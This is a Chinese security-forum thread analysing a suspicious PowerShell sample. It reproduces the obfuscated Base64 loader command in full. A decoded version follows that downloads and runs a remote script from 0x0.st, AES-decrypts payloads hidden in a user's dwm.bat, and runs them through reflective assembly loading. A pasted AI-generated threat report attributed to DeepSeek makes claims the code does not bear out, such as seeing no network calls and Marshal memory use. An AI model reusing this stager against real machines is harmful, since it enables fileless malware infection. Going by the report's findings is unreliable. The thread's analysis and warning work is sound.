可疑脚本

显示全部楼层 · 发表于 2025-2-14 10:10:02

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCdibGNoZ3BqYnBpanRleGZpYmxjaGdwamJwaWp0ZXhmd2JsY2hncGpicGlqdGV4ZnJibGNoZ3BqYnBpanRleGYgYmxjaGdwamJwaWp0ZXhmLWJsY2hncGpicGlqdGV4ZlVibGNoZ3BqYnBpanRleGZzYmxjaGdwamJwaWp0ZXhmZWJsY2hncGpicGlqdGV4ZkJibGNoZ3BqYnBpanRleGZhYmxjaGdwamJwaWp0ZXhmc2JsY2hncGpicGlqdGV4ZmlibGNoZ3BqYnBpanRleGZjYmxjaGdwamJwaWp0ZXhmUGJsY2hncGpicGlqdGV4ZmFibGNoZ3BqYnBpanRleGZyYmxjaGdwamJwaWp0ZXhmc2JsY2hncGpicGlqdGV4ZmlibGNoZ3BqYnBpanRleGZuYmxjaGdwamJwaWp0ZXhmZ2JsY2hncGpicGlqdGV4ZiAiYmxjaGdwamJwaWp0ZXhmaGJsY2hncGpicGlqdGV4ZnRibGNoZ3BqYnBpanRleGZ0YmxjaGdwamJwaWp0ZXhmcGJsY2hncGpicGlqdGV4ZnNibGNoZ3BqYnBpanRleGY6YmxjaGdwamJwaWp0ZXhmL2JsY2hncGpicGlqdGV4Zi9ibGNoZ3BqYnBpanRleGYwYmxjaGdwamJwaWp0ZXhmeGJsY2hncGpicGlqdGV4ZjBibGNoZ3BqYnBpanRleGYuYmxjaGdwamJwaWp0ZXhmc2JsY2hncGpicGlqdGV4ZnRibGNoZ3BqYnBpanRleGYvYmxjaGdwamJwaWp0ZXhmOGJsY2hncGpicGlqdGV4ZktibGNoZ3BqYnBpanRleGZ1YmxjaGdwamJwaWp0ZXhmVmJsY2hncGpicGlqdGV4Zi5ibGNoZ3BqYnBpanRleGZwYmxjaGdwamJwaWp0ZXhmc2JsY2hncGpicGlqdGV4ZjFibGNoZ3BqYnBpanRleGYiJykuUmVwbGFjZSgnYmxjaGdwamJwaWp0ZXhmJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHVta2hvKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnM2dSWEV4NlRxcHorNkxENnRKK0JNMTNqc0tJSzRESGRHaFYzMzhVdCtzTT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0prN2F4bTdWS3R2NkpXUlR4cWY1ZlE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gcnVnbmwoJHBhcmFtX3Zhcil7CUlFWCAnJHFjdXF3PU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHJtaG55PU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaHNqY3A9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkcWN1cXcsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGhzamNwLkNvcHlUbygkcm1obnkpOwkkaHNqY3AuRGlzcG9zZSgpOwkkcWN1cXcuRGlzcG9zZSgpOwkkcm1obnkuRGlzcG9zZSgpOwkkcm1obnkuVG9BcnJheSgpO31mdW5jdGlvbiB4bnliZSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckc3p4dXU9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRreHJyej0kc3p4dXUuQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICcka3hycnouQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRla3AgPSAkZW52OlVTRVJOQU1FOyRpbHZxaiA9ICdDOlxVc2Vyc1wnICsgJGVrcCArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGlsdnFqOyRmZm5waj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGlsdnFqKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgka3JzIGluICRmZm5waikgewlpZiAoJGtycy5TdGFydHNXaXRoKCc6OicpKQl7CQkkb2VidWM9JGtycy5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kam9iaHc9W3N0cmluZ1tdXSRvZWJ1Yy5TcGxpdCgnXCcpO0lFWCAnJGdkd2ZiPXJ1Z25sICh1bWtobyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRqb2Jod1swXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRtYmNtdz1ydWdubCAodW1raG8gKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkam9iaHdbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7eG55YmUgJGdkd2ZiICRudWxsO3hueWJlICRtYmNtdyAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX"

复制代码

显示全部楼层 · 发表于 2025-2-14 11:26:18

本帖最后由呼啸山庄于 2025-2-15 15:17 编辑

2025/02/15

Linux，Windows下Powershell我试了试用直接用Powershell转码，还是都不行。报错如下：
Linux Powershell 7.4.5

MethodInvocationException: Exception calling "FromBase64String" with "1" argument(s): "The input is not a valid Base-64 string as it contains a non-base 64 character, more than two padding characters, or an illegal character among the padding characters."

Windows 11 Powershell

使用“1”个参数调用“FromBase64String”时发生异常:“Base-64 字符数组或字符串的长度无效。”
所在位置行:1 字符: 1
+ [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2ll ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : FormatException

所以，脚本有问题，跑不起来的

2025/02/14

还原后大致如下：

# Amsi Bypass
try{
iex ((iex (('iwr -UseBasicParsing "https://0x0.st/8KuV.ps1"'))).Content) -ErrorAction SilentlyContinue
}catch{};
# AES解密
function umkho($param_var){
$aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::FromBase64String('3gRXEx6Tqpz+6LD6tJ+BM13jsKIK4DHdGhV338Ut+sM=');
$aes_var.IV=[System.Convert]::FromBase64String('Jk7axm7VKtv6JWRTxqf5fQ==');
$decryptor_var=$aes_var.CreateDecryptor();
$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose();
$aes_var.Dispose();
$return_var;
}
# 内存流
function rugnl($param_var){
IEX '$qcuqw=New-Object System.IO.MemoryStream(,$param_var);';
IEX '$rmhny=New-Object System.IO.MemoryStream;';
IEX '$hsjcp=New-Object System.IO.Compression.GZipStream($qcuqw, [IO.Compression.CompressionMode]::Decompress);';
$hsjcp.CopyTo($rmhny);
$hsjcp.Dispose();
$qcuqw.Dispose();
$rmhny.Dispose();
$rmhny.ToArray();
}
# 反射加载
function xnybe($param_var,$param2_var){
IEX '$szxuu=[System.Reflection.Assembly]::Load([byte[]]$param_var);';
IEX '$kxrrz=$szxuu.EntryPoint;';
IEX '$kxrrz.Invoke($null, $param2_var);';
# IEX '[System.Reflection.Assembly]::Load([byte[]]$param_var).EntryPoint.Invoke($null, $param2_var)';
}
# 读取载荷
$ekp = $env:USERNAME;
$ilvqj = 'C:\Users\' + $ekp + '\dwm.bat';
$host.UI.RawUI.WindowTitle = $ilvqj;
$ffnpj=[System.IO.File]::ReadAllText($ilvqj).Split([Environment]::NewLine);
foreach ($krs in $ffnpj) {
if ($krs.StartsWith('::')) {
$oebuc=$krs.Substring(2);
break;
}
}
# 加载
$jobhw=[string[]]$oebuc.Split('\');
IEX '$gdwfb=rugnl (umkho ([Convert]::FromBase64String($jobhw[0])));';
IEX '$mbcmw=rugnl (umkho ([Convert]::FromBase64String($jobhw[1])));';
# 反射执行
xnybe $gdwfb $null;
xnybe $mbcmw (,[string[]] ('%'));

复制代码

显示全部楼层 · 发表于 2025-2-14 12:08:47

本帖最后由 UNknownOoo 于 2025-2-14 12:11 编辑

DeepSeek

详细行为分析报告

1. 网络行为分析
未直接观察到网络请求，但代码包含多层加密/解密逻辑，解密后的内容可能包含隐藏的C2通信模块
高度可疑的 Base64多层嵌套编码，符合远程载荷投递特征

2. 代码特征分析

深度混淆技术：
      使用 blchgpjbpijtexf 等无意义字符串进行全局替换混淆
      通过 ABC 插入干扰字符（AFC/AEC等变形）
      关键函数名使用伪随机字符串（如 umkho/rugnl）

危险函数调用：
      高频使用 IEX (Invoke-Expression) 执行动态代码
      调用 System.Security.Cryptography.AES 实现数据解密
      涉及 System.IO.MemoryStream 内存流操作

3. 系统操作检测

文件系统操作：
      通过 C:\Users\$env:USERNAME\... 路径定位用户目录
      存在文件流复制 (CopyTo) 和内存注入迹象

进程注入：
      [System.Reflection.Assembly]::Load 动态加载程序集
      使用 [System.Runtime.InteropServices.Marshal] 进行非托管内存操作

4. 防御规避检测

AMSI绕过：
      通过字符串分割重组规避静态检测（ABC替换模式）

反分析技术：
      执行窗口隐藏 (-windowstyle hidden)
      执行策略绕过 (-ep bypass)
      无配置文件加载 (-noprofile)

5. 上下文关联分析
完整攻击链：
复制
载荷投递 → 内存解密 → 程序集加载 → 持久化/横向移动

战术阶段：
      符合 Cobalt Strike 等攻击框架的载荷投递模式
      具备无文件攻击特征

6. 威胁情报比对

加密模式：
      AES-CBC+PKCS7 与常见RAT（如Metasploit/Meterpreter）匹配

代码结构：
      内存加载逻辑与 PowerShell Empire 框架高度相似

威胁程度评估

综合危险值：95/100
（立即处置优先级：Critical）

显示全部楼层 · 发表于 2025-2-14 12:26:48

[病毒样本] 可疑脚本

本帖子中包含更多资源